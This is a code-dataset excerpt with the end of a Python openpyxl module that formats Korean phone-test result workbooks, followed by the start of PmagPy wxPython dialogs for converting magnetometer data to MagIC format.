sheet_out[\"B2:E24\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # top alignment adjust\n for mCell in sheet_out[\"C4:C24\"]:\n for cell in mCell:\n cell.alignment = self.top_alignment_3\n\n for mCell in sheet_out[\"D4:D24\"]:\n for cell in mCell:\n cell.alignment = self.top_alignment_3\n\n # all cell border adjust\n for mCell in sheet_out[\"B2:E24\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # set filter\n sheet_out.auto_filter.ref = \"B2:E24\"\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n sheet_width_list = [4.25, 14.75, 57, 57, 23]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n sheet_out['B2'].fill = self.brown_fill\n sheet_out['C2'].fill = self.brown_fill\n sheet_out['D2'].fill = self.brown_fill\n sheet_out['E2'].fill = self.brown_fill\n\n\n self.currentRow = self.currentRow + 1\n self.totalRows = self.totalRows + 1\n self.progress_flag.emit()\n self.setPrintText('/s {}번 파일 \"Comparison\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # main method\n def run(self):\n\n try:\n ###########################__Setting print Text Thread__######################\n\n self.thread_count = threading.Thread(target=self.getCountRows, args=())\n self.thread_count.daemon = True\n self.thread_count.start()\n self.nowTime = datetime.today().strftime(\"%Y-%m-%d\")\n\n #################################################################_SETTING INPUT_###########################################################################\n # Save root directory\n self.flag_root = os.path.isdir(self.home+\"\\\\Desktop\\\\DOC\\\\\")\n if not self.flag_root:\n os.mkdir(self.home + \"\\\\Desktop\\\\DOC\\\\\")\n\n # extract file name each list_files and make every out file path\n for item in self.list_files:\n temp_filename = os.path.basename(item)\n temp_filename = re.sub(\"(.xlsx|.xls)\", \"\", temp_filename)\n output_file = self.home+\"\\\\Desktop\\\\DOC\\\\result_\"+temp_filename+\"(\"+self.nowTime+\").xlsx\"\n self.list_out_files.append(output_file)\n\n if self.modeFlag == \"f1\":\n\n #################################################################_RESULT FILE Generate_###########################################################################\n # output file generate\n for item in self.list_out_files:\n\n wb = Workbook()\n s1 = wb.active\n s1.title = \"검증결과요약\"\n wb.create_sheet('시험결과요약', 1)\n wb.create_sheet('TRP', 2)\n wb.create_sheet('TIS', 3)\n wb.create_sheet('속도', 4)\n wb.create_sheet('Call Setup Test', 5)\n wb.create_sheet('주파수동조', 6)\n wb.create_sheet('MOS', 7)\n wb.create_sheet('배터리소모전류(시간)', 8)\n wb.create_sheet('배터리소모전류 세부데이터', 9)\n wb.create_sheet('배터리소모전류(DOU)', 10)\n wb.create_sheet('첨부1. 측정기준 및 가점', 11)\n wb.create_sheet('첨부2. 납품검사', 12)\n wb.create_sheet('첨부3. 단말 상세 SPEC', 13)\n wb.save(item)\n\n self.setPrintText(\"/s Complete making Result excel file /e\")\n self.setPrintText(\"/s Extract Original Data in each file /e\")\n\n #Core Code\n self.start_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n #Excel input Data read\n self.setPrintText(\"/s STARTED_TIME: \"+self.start_time+\" /e\")\n\n ########################################################################Start to generate openpyXL Sheet Style########################################################################\n # 검증결과요약 텝 생성\n self.summary_generate_data()\n self.totalRows = 1\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 시험결과요약 텝 생성\n self.test_generate_data()\n self.totalRows = 2\n self.currentRow = 0\n self.progress_flag.emit()\n\n # TRP 텝 생성\n self.trp_generate_data()\n self.totalRows = 3\n self.currentRow = 0\n self.progress_flag.emit()\n\n # TIS 텝 생성\n self.tis_generate_data()\n self.totalRows = 4\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 속도 텝 생성\n self.spd_generate_data()\n self.totalRows = 5\n self.currentRow = 0\n self.progress_flag.emit()\n\n # Call Setup Test 텝 생성\n self.call_generate_data()\n self.totalRows = 6\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 주파수동조 텝 생성\n self.fre_generate_data()\n self.totalRows = 7\n self.currentRow = 0\n self.progress_flag.emit()\n\n # MOS 텝 생성\n self.mos_generate_data()\n self.totalRows = 8\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 베터리소모전류(DOU) 텝 생성\n self.dou_generate_data()\n self.totalRows = 9\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 베터리소모전류 세부테이터 텝 생성\n self.bat_generate_data()\n self.totalRows = 10\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 베터리소모전류 세부테이터 텝 생성\n self.time_generate_data()\n self.totalRows = 11\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 베터리소모전류 세부테이터 텝 생성\n self.attach_generate_data_1()\n self.totalRows = 12\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 베터리소모전류 세부테이터 텝 생성\n self.attach_generate_data_2()\n self.totalRows = 13\n self.currentRow = 0\n self.progress_flag.emit()\n\n # 베터리소모전류 세부테이터 텝 생성\n self.attach_generate_data_3()\n self.totalRows = 14\n self.currentRow = 0\n self.progress_flag.emit()\n\n #############################################__progress 100%__#############################################\n self.end_count = \"y\"\n self.end_flag.emit()\n\n #Core Code\n self.end_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n #Excel input Data read\n self.setPrintText(\"/s FINISHED_TIME: \"+self.end_time+\" /e\")\n\n else:\n #Core Code\n self.start_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n #Excel input Data read\n self.setPrintText(\"/s STARTED_TIME: \"+self.start_time+\" /e\")\n self.f2_generate_data()\n self.end_count = \"y\"\n self.end_flag.emit()\n #Core Code\n self.end_time = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n #Excel input Data read\n self.setPrintText(\"/s FINISHED_TIME: \"+self.end_time+\" /e\")\n\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\nif __name__ == '__main__':\n moduler = Formater('C:\\\\Users\\\\TestEnC\\\\Desktop\\\\VOC\\\\input_sample.xlsx', 'y', 'f1')\n moduler.run()\n", "sub_path": "docBeFormater/newModule.py", "file_name": "newModule.py", "file_ext": "py", "file_size_in_byte": 171877, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtCore.QThread", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 28, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QThread.__init__", "line_number": 37, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QThread", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 48, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 53, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 60, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 61, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 62, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 63, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 64, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 65, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 66, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 67, "usage_type": "call"}, {"api_name": "openpyxl.styles.PatternFill", "line_number": 68, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 71, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 72, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 73, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 74, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 75, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 76, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 77, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 80, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 81, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 82, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 83, "usage_type": "call"}, {"api_name": "openpyxl.styles.borders.Border", "line_number": 86, "usage_type": "call"}, {"api_name": "openpyxl.styles.borders.Side", "line_number": 86, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 99, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 107, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 120, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 197, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 198, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 524, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 535, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 536, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 665, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 701, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 711, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 712, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 881, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 907, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 917, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 918, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1100, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1127, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1137, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1138, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1431, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1462, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1472, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1473, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1521, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1544, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1554, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1555, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1662, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1687, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1697, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1698, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1781, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1807, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1818, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1819, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 1949, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 1983, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1993, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 1994, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 2436, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 2500, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 2510, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 2832, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 2888, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 2898, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 2993, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 3021, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 3031, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 3105, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 3135, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 3145, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 3213, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 3240, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 3250, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 3287, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 3296, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 3310, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 3386, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 3396, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 3399, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3399, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 3403, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3403, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 3405, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 3409, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3409, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 3410, "usage_type": "call"}, {"api_name": "openpyxl.Workbook", "line_number": 3420, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 3442, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3442, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 3536, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3536, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 3542, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3542, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 3549, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3549, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 3554, "usage_type": "call"}]}
+{"seq_id": "373122207", "text": "#!/usr/bin/env pythonw\n\n#--------------------------------------------------------------\n# converting magnetometer files to MagIC format\n#--------------------------------------------------------------\nimport wx\nimport wx.grid\nimport os\nimport subprocess\nimport sys\nfrom pmagpy import pmag\nfrom pmagpy import ipmag\nfrom pmagpy import convert_2_magic as convert\nfrom dialogs import pmag_widgets as pw\nfrom dialogs import drop_down_menus3\nfrom dialogs import magic_grid2 as magic_grid\n#sys.path.append(\"../programs\") #later fix imports further down in code to \"from programs import ....\" also imports should be moved to top of file unless import is so large it slows down the program\nfrom pmagpy import convert_2_magic as convert\nfrom programs.conversion_scripts import tdt_magic\nfrom programs.conversion_scripts import jr6_txt_magic\nfrom programs.conversion_scripts import jr6_jr6_magic\nfrom programs.conversion_scripts import iodp_jr6_magic\nfrom pmagpy.mapping import map_magic\n\n\nclass import_magnetometer_data(wx.Dialog):\n def __init__(self, parent, id, title, WD):\n wx.Dialog.__init__(self, parent, id, title, name='import_magnetometer_data')\n self.parent = parent\n self.WD = WD\n self.InitUI()\n self.SetTitle(title)\n\n\n def InitUI(self):\n self.panel = wx.Panel(self)\n vbox = wx.BoxSizer(wx.VERTICAL)\n\n formats = ['generic format','SIO format','CIT format','2g-binary format','2g-ascii format',\n 'HUJI format','LDEO format','IODP format','PMD (ascii) format',\n 'TDT format', 'JR6 format', 'Utrecht format', 'BGC format']\n sbs = wx.StaticBoxSizer(wx.StaticBox(self.panel, wx.ID_ANY, 'step 1: choose file format'), wx.VERTICAL)\n sbs.AddSpacer(5)\n\n radio_buttons = []\n for fmt in formats:\n radio_button = wx.RadioButton(self.panel, -1, label=fmt, name=fmt)\n radio_buttons.append(radio_button)\n sbs.Add(radio_button, flag=wx.BOTTOM, border=5)\n if len(radio_buttons) == 1:\n sbs.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n #sbs.AddSpacer(5)\n self.Bind(wx.EVT_RADIOBUTTON, self.OnRadioButtonSelect, radio_button)\n\n radio_buttons[0].SetValue(True)\n self.checked_rb = radio_buttons[0]\n\n #---------------------\n # OK/Cancel buttons\n #---------------------\n\n hboxok = wx.BoxSizer(wx.HORIZONTAL)\n self.okButton = wx.Button(self.panel, id=-1, label='Import file')\n self.okButton.SetDefault()\n self.Bind(wx.EVT_BUTTON, self.on_okButton, self.okButton)\n self.cancelButton = wx.Button(self.panel, wx.ID_CANCEL, '&Cancel')\n self.Bind(wx.EVT_BUTTON, self.on_cancelButton, self.cancelButton)\n self.Bind(wx.EVT_CLOSE, self.on_cancelButton)\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n\n self.nextButton = wx.Button(self.panel, id=-1, label='Go to next step')\n self.Bind(wx.EVT_BUTTON, self.on_nextButton, self.nextButton)\n hboxok.Add(self.okButton)\n hboxok.AddSpacer(20)\n hboxok.Add(self.cancelButton )\n hboxok.AddSpacer(20)\n hboxok.Add(self.nextButton )\n\n #-----------------------\n # design the frame\n #-----------------------\n vbox.AddSpacer(10)\n vbox.Add(sbs)\n vbox.AddSpacer(10)\n vbox.Add(hboxok)\n vbox.AddSpacer(10)\n\n hbox1=wx.BoxSizer(wx.HORIZONTAL)\n hbox1.AddSpacer(10)\n hbox1.Add(vbox)\n hbox1.AddSpacer(10)\n\n self.panel.SetSizer(hbox1)\n hbox1.Fit(self)\n\n #-----------------------\n # button methods\n #-----------------------\n\n def on_cancelButton(self,event):\n self.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n\n\n def on_okButton(self,event):\n os.chdir(self.WD)\n file_type = self.checked_rb.Label.split()[0] # extracts name of the checked radio button\n if file_type == 'generic':\n dia = convert_generic_files_to_MagIC(self, self.WD, \"PmagPy generic file conversion\")\n elif file_type == 'SIO':\n dia = convert_SIO_files_to_MagIC(self, self.WD, \"PmagPy SIO file conversion\")\n elif file_type == 'CIT':\n dia = convert_CIT_files_to_MagIC(self, self.WD, \"PmagPy CIT file conversion\")\n elif file_type == '2g-binary':\n dia = convert_2g_binary_files_to_MagIC(self, self.WD, \"PmagPy 2g-binary file conversion\")\n elif file_type == '2g-ascii':\n dia = convert_2g_ascii_files_to_MagIC(self, self.WD, \"PmagPy 2g-ascii file conversion\")\n elif file_type == 'HUJI':\n dia = convert_HUJI_files_to_MagIC(self, self.WD, \"PmagPy HUJI file conversion\")\n elif file_type == 'LDEO':\n dia = convert_LDEO_files_to_MagIC(self, self.WD, \"PmagPy LDEO file conversion\")\n elif file_type == 'IODP':\n dia = convert_IODP_files_to_MagIC(self, self.WD, \"PmagPy IODP csv conversion\")\n elif file_type == 'PMD':\n dia = convert_PMD_files_to_MagIC(self, self.WD, \"PmagPy PMD conversion\")\n elif file_type == 'BGC':\n dia = convert_BGC_files_to_magic(self, self.WD, \"PmagPy BGC conversion\")\n elif file_type == 'TDT':\n tdt_magic.convert(False, self.WD)\n return True\n elif file_type == 'JR6':\n dia = convert_JR6_files_to_MagIC(self, self.WD)\n elif file_type == 'Utrecht':\n dia = convert_Utrecht_files_to_MagIC(self, self.WD, \"PmagPy Utrecht conversion\")\n dia.Center()\n dia.Show()\n\n\n def OnRadioButtonSelect(self, event):\n self.checked_rb = event.GetEventObject()\n\n def on_nextButton(self,event):\n self.Destroy()\n combine_dia = combine_magic_dialog(self.WD, self.parent)\n combine_dia.Show()\n combine_dia.Center()\n\n#--------------------------------------------------------------\n# dialog for combine_magic.py\n#--------------------------------------------------------------\n\n\nclass combine_magic_dialog(wx.Frame):\n \"\"\"\"\"\"\n title = \"Combine magic files\"\n\n def __init__(self, WD, parent):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self) #wx.Panel(self)\n self.parent = parent\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.WD=WD\n self.InitUI()\n\n def InitUI(self):\n pnl = self.panel\n\n #---sizer information ----\n\n TEXT=\"Step 2: \\nCombine different MagIC formatted files to one file named 'measurements.txt'\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl,label=TEXT),wx.ALIGN_LEFT)\n\n\n #---sizer 0 ----\n self.bSizer0 = pw.combine_files(self, \".magic\", DM=3)\n #------------------\n\n self.okButton = wx.Button(self.panel, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.on_okButton, self.okButton)\n\n self.cancelButton = wx.Button(self.panel, wx.ID_CANCEL, '&Cancel')\n self.Bind(wx.EVT_BUTTON, self.on_cancelButton, self.cancelButton)\n self.Bind(wx.EVT_CLOSE, self.on_cancelButton)\n\n self.nextButton = wx.Button(self.panel, id=-1, label='Go to last step')\n self.Bind(wx.EVT_BUTTON, self.on_nextButton, self.nextButton)\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n #\n hboxok = wx.BoxSizer(wx.HORIZONTAL)\n hboxok.Add(self.okButton)\n hboxok.Add(self.cancelButton, flag=wx.LEFT, border=5)\n hboxok.Add(self.nextButton, flag=wx.LEFT, border=5)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT)\n vbox.AddSpacer(10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT)\n vbox.AddSpacer(10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(5)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_cancelButton(self,event):\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n def on_nextButton(self, event):\n combine_dia = combine_everything_dialog(self.WD, self.Parent)\n combine_dia.Show()\n combine_dia.Center()\n self.Destroy()\n\n def on_okButton(self,event):\n os.chdir(self.WD) # make sure OS is working in self.WD (Windows issue)\n files_text=self.bSizer0.file_paths.GetValue()\n files=files_text.strip('\\n').replace(\" \",\"\")\n if files:\n files = files.split('\\n')\n files = [os.path.join(self.WD, f) for f in files]\n COMMAND=\"combine_magic.py -F measurements.txt -f %s\"%(\" \".join(files) )\n\n if ipmag.combine_magic(files, 'measurements.txt', data_model=3.0):\n MSG=\"%i file are merged to one MagIC format file:\\n measurements.txt.\\n\\nSee Terminal/message window for errors\"%(len(files))\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=MSG ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n else:\n pw.simple_warning()\n return\n\n self.on_nextButton(event)\n self.Destroy()\n\n\nclass combine_everything_dialog(wx.Frame):\n \"\"\"\"\"\"\n title = \"Combine MagIC files\"\n\n def __init__(self, WD, parent):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self) #wx.Panel(self)\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.parent = parent\n self.WD=WD\n self.InitUI()\n\n def InitUI(self):\n\n pnl = self.panel\n\n #---sizer information ----\n\n TEXT=\"Step 3: \\nCombine different MagIC formatted files to one file name (if necessary). All files should be from the working directory.\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl,label=TEXT),wx.ALIGN_LEFT)\n\n possible_file_dias = ['specimens.txt', 'samples.txt', 'sites.txt', 'locations.txt']\n self.file_dias = []\n all_files = os.listdir(self.WD)\n for dia in possible_file_dias:\n for f in all_files:\n if dia in f:\n bSizer = pw.combine_files(self, dia, DM=3)\n self.file_dias.append(bSizer)\n break\n if not self.file_dias:\n file_string = ', '.join(possible_file_dias)\n MSG = \"You have no more files that can be combined.\\nFile types that can be combined are:\\n{}\\nNote that your file name must end with the file type, i.e.:\\nsomething_something_specimens.txt\".format(file_string)\n dlg = wx.MessageDialog(None,caption=\"Message:\", message=MSG ,style=wx.OK|wx.ICON_INFORMATION)\n dlg.ShowModal()\n dlg.Destroy()\n\n #------------------\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n\n self.okButton = wx.Button(self.panel, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.on_okButton, self.okButton)\n\n self.cancelButton = wx.Button(self.panel, wx.ID_CANCEL, '&Cancel')\n self.Bind(wx.EVT_BUTTON, self.on_cancelButton, self.cancelButton)\n self.Bind(wx.EVT_CLOSE, self.on_cancelButton)\n\n hboxok = wx.BoxSizer(wx.HORIZONTAL)\n hboxok.Add(self.okButton)\n hboxok.Add(self.cancelButton, flag=wx.LEFT, border=5 )\n\n #file_dias = [self.bSizer0, self.bSizer1, self.bSizer2]\n if len(self.file_dias) == 4:\n num_cols, num_rows = 2, 2\n else:\n num_cols = min(len(self.file_dias), 3)\n num_rows = 2 if len(self.file_dias) > 3 else 1\n hboxfiles = wx.GridSizer(num_rows, num_cols, 1, 1)\n hboxfiles.AddMany(self.file_dias)\n\n #hboxfiles = wx.BoxSizer(wx.HORIZONTAL)\n #hboxfiles.AddMany([self.bSizer0, self.bSizer1, self.bSizer2])\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.BOTTOM, border=5)\n vbox.AddSpacer(10)\n vbox.Add(hboxfiles, flag=wx.ALIGN_LEFT)\n vbox.AddSpacer(10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(5)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_cancelButton(self,event):\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n def on_okButton(self,event):\n os.chdir(self.WD)\n success = True\n new_files = []\n # go through each pw.combine_files sizer, extract the files, try to combine them into one:\n for bSizer in self.file_dias:\n full_list = bSizer.file_paths.GetValue()\n file_name = bSizer.text\n files = full_list.strip('\\n').replace(\" \", \"\")\n if files:\n files = files.split('\\n')\n else:\n print('No files of {} type found, skipping'.format(file_name))\n continue\n res = ipmag.combine_magic(files, file_name, data_model=3.0)\n if res:\n new_files.append(file_name) # add to the list of successfully combined files\n else:\n success = False\n if success:\n new = '\\n' + '\\n'.join(new_files)\n MSG = \"Created new file(s): {} \\nSee Terminal/message window for details and errors\".format(new)\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=MSG ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n else:\n pw.simple_warning()\n # make sure contribution is created\n self.Parent.get_wd_data()\n\n\n#--------------------------------------------------------------\n# MagIC generic files conversion\n#--------------------------------------------------------------\n\n\nclass convert_files_to_MagIC(wx.Frame):\n \"\"\"\n Abstract class for file conversion frames\n \"\"\"\n\n def __init__(self, parent, WD, title):\n self.parent = parent\n self.WD = WD\n self.title = title\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self)\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.InitUI()\n\n def InitUI(self):\n pass\n\n def on_cancelButton(self, event):\n self.Destroy()\n self.parent.Show()\n self.parent.Raise()\n\n def on_add_file_button(self, event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n def on_add_dir_button(self, event):\n text = \"choose directory of files to convert to MagIC\"\n pw.on_add_dir_button(self.bSizer0, text)\n\n\nclass convert_generic_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"\"\"\"\n title = \"PmagPy generic file conversion\"\n\n def InitUI(self):\n\n pnl = self.panel\n\n #---sizer infor ----\n\n TEXT = \"convert generic file to MagIC format\"\n bSizer_info = 